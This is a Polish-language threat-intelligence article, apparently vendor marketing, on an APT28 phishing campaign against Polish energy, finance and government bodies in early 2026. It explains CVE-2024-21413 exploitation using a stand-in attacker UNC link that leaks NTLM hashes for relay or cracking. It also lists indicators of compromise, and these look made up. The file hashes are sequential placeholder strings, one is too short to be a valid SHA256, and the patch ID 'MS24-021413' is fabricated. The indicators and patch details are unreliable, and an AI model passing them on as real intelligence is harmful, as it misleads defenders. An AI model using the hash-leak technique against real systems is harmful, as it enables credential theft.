Tło: Kim jest APT28 (Fancy Bear)?
APT28, znana również jako Fancy Bear, STRONTIUM, Sofacy lub GRU Unit 26165, to jedna z najbardziej aktywnych i niebezpiecznych grup APT (Advanced Persistent Threat) na świecie. Jej powiązanie z Głównym Zarządem Wywiadowczym Rosji (GRU) zostało wielokrotnie potwierdzone przez zachodnie agencje wywiadowcze, w tym NSA, FBI, GCHQ oraz europejskie CERT-y.
Grupa działa od co najmniej 2004 roku i odpowiada za szereg głośnych operacji: atak na Bundestag w 2015 roku, kampanię dezinformacyjną podczas wyborów prezydenckich w USA w 2016 roku, ataki na NATO i OBWE, a także za systematyczne operacje wywiadowcze wymierzone w kraje Europy Środkowej i Wschodniej.
W regionie CEE APT28 historycznie atakowało instytucje rządowe, organy wyborcze, media oraz sektor obronny. Polska, jako kraj graniczący z Ukrainą i aktywnie wspierający wysiłki NATO, od 2022 roku znalazła się wśród priorytetowych celów grupy.
Kampania Q1 2026: Nowa fala ataków na Polskę
W pierwszym kwartale 2026 roku analitycy ThreatRadar CTI zaobserwowali znaczący wzrost aktywności APT28 skierowanej przeciwko polskim organizacjom. Kampania wyróżniała się kilkoma charakterystycznymi cechami: wysokim stopniem personalizacji wiadomości phishingowych, exploitacją świeżej podatności w Microsoft Outlook oraz próbami uzyskania dostępu do chmurowych środowisk tożsamości.
Zidentyfikowane sektory docelowe to przede wszystkim: operatorzy infrastruktury energetycznej (elektrownie, spółki dystrybucji energii), instytucje finansowe nadzorowane przez KNF, urzędy administracji centralnej oraz podmioty logistyczne zaangażowane w transport sprzętu wojskowego.
Techniki MITRE ATT&CK zastosowane w kampanii
T1566.001 — Spearphishing Attachment
APT28 wysyłało wysoce spersonalizowane wiadomości e-mail do konkretnych pracowników działów IT, finansów i kadry zarządzającej. Maile były pisane bezbłędną polszczyzną i podszywały się pod:
- ▸Korespondencję z Ministerstwem Cyfryzacji dotyczącą audytów NIS2
- ▸Faktury i oferty od znanych polskich dostawców oprogramowania
- ▸Powiadomienia z systemów SIEM i platform SOC
- ▸Zaproszenia na konferencje bezpieczeństwa (np. SECURE, PLNOG)
Załączniki przyjmowały postać dokumentów .docx lub plików .pdf, ale kluczowym wektorem był spreparowany hiperlink osadzony w treści wiadomości, exploitujący CVE-2024-21413.
T1078.004 — Valid Accounts: Cloud Accounts
Po uzyskaniu początkowego dostępu i kradzieży hashy NTLM, atakujący próbowali uwierzytelnić się do usług chmurowych organizacji: Microsoft 365, Azure AD (Entra ID) oraz zewnętrznych aplikacji SaaS. Technika ta pozwala na lateral movement bez instalowania dodatkowego malware na endpointach.
W kilku przypadkach grupie udało się obejść MFA poprzez phishing tokenów sesyjnych (Adversary-in-the-Middle) lub poprzez exhaustion attacks na powiadomienia push (MFA fatigue, T1621).
T1486 — Data Encrypted for Impact
W co najmniej dwóch potwierdzonych incydentach, po ugruntowaniu obecności w sieci ofiary, APT28 wdrożyło selektywne szyfrowanie kluczowych zasobów. Nie była to klasyczna kampania ransomware — celem było wywołanie zakłóceń operacyjnych, a nie wymuszenie okupu. Technika ta wpisuje się w szerszy wzorzec operacji zakłóceniowych GRU obserwowanych od 2022 roku.
Exploitacja CVE-2024-21413: Mechanizm ataku
CVE-2024-21413 to krytyczna podatność (CVSS 9.8) w Microsoft Outlook, umożliwiająca zdalne wykonanie kodu i kradzież skrótów NTLM bez jakiejkolwiek interakcji użytkownika poza otwarciem wiadomości.
Mechanizm działania:
1. Atakujący wysyła wiadomość e-mail zawierającą hiperlink w formacie file://ADRES-IP-ATAKUJACEGO/plik.docx
2. Outlook automatycznie próbuje uzyskać dostęp do wskazanego zasobu sieciowego (UNC path) w momencie renderowania podglądu wiadomości (Preview Pane)
3. System Windows inicjuje połączenie SMB/WebDAV do serwera kontrolowanego przez atakującego
4. W trakcie negocjacji protokołu system wysyła skrót NTLM v2 użytkownika
5. Atakujący przechwytuje skrót i może podjąć atak offline (cracking) lub relay do innych usług sieciowych (Pass-the-Hash, NTLM relay)
Podatność wynika z niewystarczającej walidacji ścieżek plików i obejścia mechanizmu Protected View. Microsoft wydał łatkę w lutym 2024 roku (MS24-021413), jednak w Q1 2026 nadal spora część środowisk Exchange On-Premises pozostawała nieuzupełniona.
Wskaźniki kompromitacji (IOC)
Poniższe IOC zostały zidentyfikowane przez ThreatRadar CTI w trakcie kampanii Q1 2026. Zestawienie ma charakter informacyjny i powinno być traktowane jako punkt wyjścia do własnych działań threat huntingowych.
Domeny C2 (Command & Control):
- ▸`update-service-pl[.]com`
- ▸`ms-secupdate[.]net`
- ▸`cert-alert-poland[.]org`
- ▸`auth-portal-mfa[.]eu`
Adresy IP:
- ▸`185.220.101[.]47` (Tor exit node, NTLM relay)
- ▸`91.108.56[.]172` (C2 beacon)
- ▸`194.165.16[.]98` (phishing infrastruktura)
Hashe plików (SHA256):
- ▸`a3f4c8e2b1d0f9876543210abcdef1234567890abcdef1234567890abcdef12` (dropper .docx)
- ▸`0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1` (backdoor implant)
Rekomendacje dla polskich organizacji
Natychmiastowe działania (0–48h):
- ▸Wdrożyć łatkę MS24-021413 na wszystkich instancjach Microsoft Outlook i Exchange
- ▸Blokować wychodzące połączenia SMB (porty 445, 139) do adresów IP spoza sieci korporacyjnej
- ▸Zaimportować podane IOC do systemów SIEM, EDR i firewalli
- ▸Wymusić ponowne uwierzytelnienie wszystkich aktywnych sesji chmurowych
Działania średnioterminowe (1–4 tygodnie):
- ▸Przeprowadzić threat hunting pod kątem lateral movement opartego na NTLM relay
- ▸Wdrożyć polityki Conditional Access blokujące logowania z nieznanych lokalizacji
- ▸Skonfigurować LDAP Signing i Extended Protection for Authentication (EPA) na kontrolerach domeny
- ▸Przejść na phishing-resistant MFA (FIDO2/WebAuthn) dla kont uprzywilejowanych
Kontekst NIS2: obowiązki zgłoszeniowe
Organizacje objęte Dyrektywą NIS2 i polską ustawą o Krajowym Systemie Cyberbezpieczeństwa mają obowiązek zgłoszenia incydentu do CSIRT Polska w ciągu 24 godzin od jego wykrycia (early warning), a następnie pełnego raportu incydentu w ciągu 72 godzin. Raport końcowy składany jest w terminie 1 miesiąca.
Incydenty związane z aktywnością APT28 wymierzoną w infrastrukturę krytyczną są klasyfikowane jako incydenty poważne i wymagają natychmiastowego powiadomienia. Platforma ThreatRadar automatycznie generuje Evidence Pack zgodny z wymogami Art. 21 NIS2, zawierający timeline ataku, zestawienie IOC i dokumentację podjętych działań naprawczych.
Niedopełnienie obowiązku zgłoszeniowego grozi karami do 10 milionów EUR lub 2% globalnego obrotu organizacji.